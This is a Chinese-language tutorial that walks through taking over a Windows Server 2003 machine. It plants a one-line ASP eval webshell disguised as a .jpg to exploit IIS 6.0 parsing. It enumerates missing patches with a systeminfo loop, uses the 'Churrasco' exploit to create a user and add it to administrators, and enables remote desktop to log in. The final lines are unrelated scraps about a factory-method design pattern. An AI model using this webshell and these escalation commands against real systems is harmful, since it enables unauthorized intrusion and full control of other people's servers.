目錄
一,什么是提權?
二,提權的前提
三,如何提權?
1,第一步連接服務器
?2,提升權限至iuser?編輯
3,利用補丁漏洞提權至最高級
四,總結
一,什么是提權?
提權顧名思義就是提升我們的權限能夠讓我們去做更多的事,就好比皇帝跟大臣,很多事情只有皇帝能做,大臣做不了例如擬圣旨,掌管虎符,擁有所有人的生殺大權,我們提權的目的就是當皇帝,皇帝做的我們也能做。
二,提權的前提
提權的前提是我們已經拿到了對方服務器的webshell,可以通過文件上傳,SQL注入,反序列化等等把一句話木馬上傳到對方服務器,然后用蟻劍,哥斯拉,冰蝎,菜刀等等工具成功連接。
三,如何提權?
這里用Windows server2003做演示
工具:菜刀
自動開啟遠程登錄腳本:3389.exe
巴西烤肉漏洞利用腳本:bx.exe
一句話木馬文件test.asp;.jpg內容:
<%eval request("test")%>
這個文件的命名有2個作用第一繞過上傳檢測,第二個是利用了iis6.0的文件解析漏洞,在iis6.0中會把test.asp;.jpg當作.asp文件來執行,而且在iis6.0中還會把*.asp文件夾中的所有文件當作.asp文件來執行。
1,第一步連接服務器
?
連接成功?
?2,提升權限至iuser
因為我們用菜刀連接服務器的cmd權限只是一個來賓用戶沒有iuser權限只能進行一些基本的操作,那么怎么辦呢?我們可以搭建一個跟對方服務器一樣的環境然后把我們具有足夠權限的cmd上傳到對方服務器上運行就可以了。
通過菜刀上傳我們的cmd.exe
使用setp來修改終端路徑,格式setp +cmd.exe的絕對路徑
setp c:\www.test\XYCMS\cmd.exe
?然后發現可以用基本的操作命令了
?但是我們發現我們只是network service它的權限與Users組相同
創建用戶失敗權限不夠,因為iuser權限沒有這個系統級的權限不能夠對它進行系統級的操作
所以我們還得繼續提升權限,通過systeminfo查看對方打了那些補丁。
3,利用補丁漏洞提權至最高級
通過以下命令來查看有那些未打補丁的漏洞可以利用
systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
這里解讀一下命令的作用
1,systeminfo>micropoor.txt:將systeminfo的信息重定向(寫入)到micropoor.txt中
2,&:命令連接符,用&連接的多條命令可以一同執行
3,|:管道,可以理解為傳輸數據的通道
4,(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)
這里的for是循環的意思依次從( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 )中取一個值給%i,@type從micropoor.txt讀取內容,@find查找%i是否為
micropoor.txt中的內容找到為真,||邏輯運算符左邊為真時右邊不執行,左邊為假時執行右邊,
5,del /f /q /a micropoor.txt:del刪除文件命令,/f 強制執行,/q不詢問用戶,/a文件屬性
6,這個命令的整體意思就是把systeminfo的信息寫入文件然后與我們給定的編號進行查找如果有就不管,如果沒有就輸出它的編號,最后刪除micropoor.txt文件。
?這里我們使用經典的巴西烤肉漏洞
?
?然后利用腳本創建用戶
?
?可以看到創建成功了,說明提權成功。
從下面可以看出新建的用戶是屬于Users組的,在這個組中也只有少量的權限,所以我們把它拉到administrators組中。
?使用命令:
bx.exe "net localgroup administrators hack /add"
?拉入成功
?接下來通過菜刀上傳我們的自動開啟遠程登錄腳本,開啟對方的遠程登錄
?
開啟成功
?去連接對方
?
?
登錄成功,成功拿下對方服務器。
四,總結
說一下我的滲透思路吧,首先通過對方服務器的各種漏洞將我們的一句話木馬上傳至對方的服務器然后通過各種滲透工具連接服務器拿到基本的shell權限,然后將權限提升至基本用戶權限,再通過對方補丁漏洞提升至最高權限。
)
)
)
工廠方法模式(pattern of factory method))
)